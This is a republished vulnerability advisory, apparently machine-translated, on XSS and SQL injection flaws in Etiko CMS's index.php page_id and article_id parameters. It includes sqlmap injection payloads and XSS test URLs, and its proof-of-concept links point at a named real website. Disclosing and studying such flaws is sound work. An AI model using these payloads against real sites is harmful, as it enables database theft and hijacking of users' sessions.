Etiko CMS index. php Cross-Site Scripting Vulnerability

Source: Internet
Author: User

Etiko CMS index. php Cross-Site Scripting Vulnerability

Affected Systems:

Etiko CMS

Etiko CMS is a content management system.

The Etiko CMS does not validate the index. A cross-site scripting vulnerability exists in php script input implementation. Remote attackers can exploit this vulnerability to execute scripts in users' Web browsers by using the page_id or article_id parameter in the constructed URL, steal cookie authentication creden.

<* Source: Felipe "Renzi" Gabriel

Link: http://xforce.iss.net/xforce/xfdb/97031
*>

Test method:

# SQL Injection & XSS on Etiko CMS.

# Risk: High

# CWE number: CWE-89, CWE-79

# Date: 13/10/2014

# Vendor: www.etikweb.com

# Version: All

# Author: Felipe "Renzi" Gabriel

# Contact: renzi@linuxmail.org

# Tested on: Windows 8; Chrome; Sqlmap 1.0-dev-nongit-20140906

# Vulnerables Files:/index. php &/loja/index. php

# Exploits: http://www.target.com/loja/index.php? Page_id = 19 [XSS] & [SQLi]

Http://www.target.com/index.php? Article_id = 16 [SQLi] & [XSS]


# PoC: The http://www.centrovegetariano.org/loja/index.php? Page_id = 19

Http://www.centrovegetariano.org/index.php? Article_id = 16


--- "SQLI using SQLMAP ."---

---
Place: GET
Parameter: page_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: page_id = 19 'AND 3987 = 3987 AND 'tulh' = 'tulh

Type: UNION query
Title: MySQL UNION query (NULL)-3 columns
Payload: page_id =-5362 'Union all select null, NULL, CONCAT (0x7175616f71, 0x467a784a6e62664d5a79, 0x716b756271 )#

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: page_id = 19 'and sleep (5) AND 'mnts' = 'mnts
---

---
Place: GET
Parameter: article_id
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: article_id = 16' AND 8044 = 8044 AND 'ykze' = 'ykze

Type: UNION query
Title: MySQL UNION query (NULL)-10 columns
Payload: article_id =-2752 'Union all select 60,60, 60,60, 60,60, CONCAT (0x7167687671, 0x6d54706b774f4a6f667a, 0x7172707a71), 60,60, 60 #

Type: AND/OR time-based blind
Title: MySQL> 5.0.11 AND time-based blind
Payload: article_id = 16' and sleep (5) AND 'mdwy' = 'mdwy
---

 

--- "XSS using HTML injection ."---

Http://www.centrovegetariano.org/loja/index.php? Page_id = 19 "> <marquee> XSS </marquee>

Http://www.centrovegetariano.org/index.php? Article_id = 16 "> <marquee> XSS </marquee>

Vendor patch:

Etiko
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.etikweb.com/

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.